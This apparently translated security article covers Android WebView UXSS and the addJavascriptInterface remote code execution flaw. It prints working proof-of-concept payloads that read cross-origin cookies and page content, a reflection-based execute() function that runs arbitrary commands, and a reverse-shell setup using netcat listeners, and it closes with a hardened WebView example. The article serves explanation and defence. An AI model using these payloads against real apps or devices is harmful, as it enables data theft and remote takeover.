1. What is WebView UXSS
WebView is the component underlying the Android Chrome browser and the core class of Android's WebKit package. It derives from View in the Android SDK, so an Activity layout can embed it and render web pages directly, implementing basic browser functions without invoking the browser.
The basic usage of WebView in an Android program is as follows:
Layout file:
<?xml version="1.0" encoding="utf-8"?>
<WebView xmlns:android="http://schemas.android.com/apk/res/android"
    android:id="@+id/webview"
    android:layout_width="fill_parent"
    android:layout_height="fill_parent" />
Loading a web page:
WebView myWebView = (WebView) findViewById(R.id.webview);
myWebView.loadUrl("http://www.example.com");
Declaring the permission in the manifest:
<manifest ...>
    <uses-permission android:name="android.permission.INTERNET" />
    ...
</manifest>
Because these XSS vulnerabilities live in WebView itself and do not depend on a specific web site or device, they affect every WebKit-based browser; they are therefore called Universal XSS (UXSS).
2. Google's public WebView UXSS
PoC (hehe.html):
<iframe name="test" src="http://www.g.cn"></iframe>
<input type=button value="test" onclick="window.open('\u0000javascript:alert(document.cookie)', 'test')">
or
<iframe name="test" src="http://www.g.cn"></iframe>
<input type=button value="test" onclick="window.open('\x00javascript:alert(document.cookie)', 'test')">
PoC:
<script>
i = document.body.appendChild(document.createElement("iframe"));
i.src = "http://google.com";
i.onload = function () {
    document.documentURI = "javascript://hostname.com/%0d%0aalert('OH HAI ' + location)";
    i.contentWindow.location = "";
}
</script>
PoC:
<script>
window.onload = function () {
    object = document.createElement("object");
    object.data = "http://google.com/";
    document.body.appendChild(object);
    object.onload = function () {
        object.data = "javascript:alert(document.body.innerHTML)";
        object.innerHTML = "foo";
    }
}
</script>
The bug report describes four ways of triggering frame-related UXSS.
One of the PoCs: insert the target frame element while the helper frame element's onunload handler is executing, after all candidates for the child-frame disconnector have already been collected.
container = document.body.appendChild(document.createElement("div"));
helperFrame = container.appendChild(document.createElement("iframe"));
targetFrame = document.createElement("iframe");
helperFrame.contentWindow.onunload = function () {
    container.insertBefore(targetFrame, helperFrame);
};
document.body.removeChild(container);
alert(targetFrame.contentWindow);
In v8natives.js of Chromium:
function NewFunction(arg1) {
    ...
    var source = '(function(' + p + ') {\n' + body + '\n})';
    ...
    var f = %CompileString(source)();
When the 'this' pointer refers to the V8 builtins object, a user-supplied function body is compiled into that source string, and the JavaScript code inside it executes.
PoC: javascript:Function("}, alert(this), {")
A more detailed exploit:
<body><script>
frame = document.body.appendChild(document.createElement("iframe"));
frame.src = "http://xkcd.com/";
frame.onload = function () {
    Function("}, (builtins = this), function () {");
    originalInstantiate = builtins.Instantiate;
    builtins.DefineOneShotAccessor(builtins, "Instantiate", function () {});
    flag = 0;
    template = null;
    builtins.Instantiate = function (x, y) {
        if (flag) {
            doc = frame.contentWindow.document;
            alert(doc.body.innerHTML);
            flag = 0;
        } else if (!template) template = x;
        return originalInstantiate(x, y);
    };
    document.implementation;
    flag = 1;
    builtins.ConfigureTemplateInstance(frame.contentWindow, template);
}
</script></body>
Someone on WooYun built an online test page for mobile-browser UXSS vulnerabilities: http://uxss.sinaapp.com
The PoCs it currently includes are:
https://code.google.com/p/chromium/issues/detail?id=143437
https://code.google.com/p/chromium/issues/detail?id=37383
https://code.google.com/p/chromium/issues/detail?id=143439
https://code.google.com/p/chromium/issues/detail?id=98053
https://code.google.com/p/chromium/issues/detail?id=117550
https://code.google.com/p/chromium/issues/detail?id=90222
With UXSS, an attacker can bypass the same-origin policy and execute JavaScript in the context of other origins. If the app's WebView that loads the attack page also has access to local files, and the app holds session cookies, passwords or other sensitive information, those local files and that sensitive information may be stolen.
3. The more dangerous WebView addJavascriptInterface interface
This interface implements interaction between native Java and JavaScript. Through addJavascriptInterface, JavaScript injected into the WebView can call native Java methods, and in the worst case control the Android system.
When an Android app uses the WebView addJavascriptInterface interface and is built for an API level below that of Android 4.2, a WebView remote code execution vulnerability may exist; what the exploit can do depends on the permissions held by the app that uses the WebView.
The following code illustrates how addJavascriptInterface is used in a WebView:
import android.app.Activity;
import android.os.Bundle;
import android.webkit.WebView;

public class MainActivity extends Activity {
    private WebView myWebView;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        myWebView = new WebView(this);
        myWebView.getSettings().setJavaScriptEnabled(true); // allow JavaScript execution
        // Registers an object named jsinterface that JS can access and whose methods it can call.
        myWebView.addJavascriptInterface(new JavaScriptInterface(), "jsinterface");
        myWebView.loadUrl("http://192.168.3.155/attackwv.html"); // WebView loads the page that calls jsinterface
        setContentView(myWebView);
    }

    final class JavaScriptInterface {
        JavaScriptInterface() {
        }

        public String getSomeString() {
            return "Hello, world";
        }
    }
}
In Attackwv.html, a simple call to the
The result in the Android 4.1.2 emulator is as follows: the JavaScriptInterface method in the WebView was successfully called from JS.
But we are not content with merely printing Hello World; is there a way to execute arbitrary commands remotely?
The answer is yes: Java's reflection mechanism can be used to obtain the java.lang.Runtime object and execute arbitrary commands, whose privileges depend on the permissions of the app that uses the WebView.
The modified attackwv1.html, as shown below, uses an execute function to successfully obtain a reverse shell.
Open two shell windows on 192.168.3.166:
nc -l -vv 8088
nc -l -vv 9999
The shell of the Android 4.1.2 emulator was obtained successfully.
The limitation of this method is that the interface name jsinterface must be known. However, by enumerating the objects of the loaded page's window and checking whether each one supports Java reflection, an object through which Java methods can be called can be found without knowing the interface name. The amended execute function is as follows:
function execute(cmd) {
    for (var obj in window) {
        if ("getClass" in window[obj]) {
            return window[obj].getClass().forName("java.lang.Runtime").getMethod("getRuntime", null).invoke(null, null).exec(cmd);
        }
    }
}
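As an added example (not code from the original post), here is a hardened counterpart to the MainActivity above that addresses both the UXSS risk from section 1 and 2 (web content reading local files, the WebView being steered to an attacker's page) and the addJavascriptInterface reflection attack from section 3. It assumes the app is compiled against and targets API level 17 (Android 4.2) or higher, so that the @JavascriptInterface annotation is enforced; the package name, class names and TRUSTED_HOST are placeholders chosen for the example.

```java
package com.example.webviewhardening; // hypothetical package name

import android.app.Activity;
import android.net.Uri;
import android.os.Build;
import android.os.Bundle;
import android.webkit.JavascriptInterface;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;

public class HardenedWebViewActivity extends Activity {
    // Placeholder: the only origin this WebView is allowed to load.
    private static final String TRUSTED_HOST = "app.example.com";

    private WebView webView;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        webView = new WebView(this);
        WebSettings settings = webView.getSettings();

        // Enable JavaScript only because the trusted page needs it.
        settings.setJavaScriptEnabled(true);

        // Keep web content away from the app's private storage: a UXSS or an
        // injected script in this WebView can then not read file:// URLs.
        settings.setAllowFileAccess(false);
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN) { // API 16
            settings.setAllowFileAccessFromFileURLs(false);
            settings.setAllowUniversalAccessFromFileURLs(false);
        }

        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1) { // API 17
            // From API 17 only @JavascriptInterface methods of the bridge are
            // visible to JavaScript, so getClass() and reflection are unreachable.
            webView.addJavascriptInterface(new SafeBridge(), "jsinterface");
        } else if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.HONEYCOMB) { // API 11
            // Below API 17 every public method of any bridge object is exposed
            // (the execute() attack above), so register no bridge at all and
            // remove the one the platform adds by itself on these versions.
            webView.removeJavascriptInterface("searchBoxJavaBridge_");
        }

        // Refuse navigation to anything but https://TRUSTED_HOST so that the
        // WebView (and its bridge) cannot be steered to an attacker's page.
        webView.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                return !isTrusted(url); // returning true blocks the navigation
            }
        });

        webView.loadUrl("https://" + TRUSTED_HOST + "/index.html");
        setContentView(webView);
    }

    /** Allow only https URLs whose host is exactly TRUSTED_HOST. */
    static boolean isTrusted(String url) {
        Uri uri = Uri.parse(url);
        return "https".equals(uri.getScheme()) && TRUSTED_HOST.equals(uri.getHost());
    }

    /** Bridge object exposing a single annotated method and nothing else. */
    static final class SafeBridge {
        @JavascriptInterface
        public String getSomeString() {
            return "Hello, world";
        }
        // No further public methods: getClass() is inherited from Object but is
        // not annotated, so JavaScript cannot call it on API 17 and above.
    }
}
```

The design choice worth noting is the version split: annotating the bridge fixes the reflection path only where the platform enforces the annotation, so on devices below Android 4.2 the safe option is to expose no bridge, not a smaller one. The file-access settings and the navigation allowlist limit what a UXSS in the WebView engine itself can reach even before a platform fix is available.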
Android WebView Security Research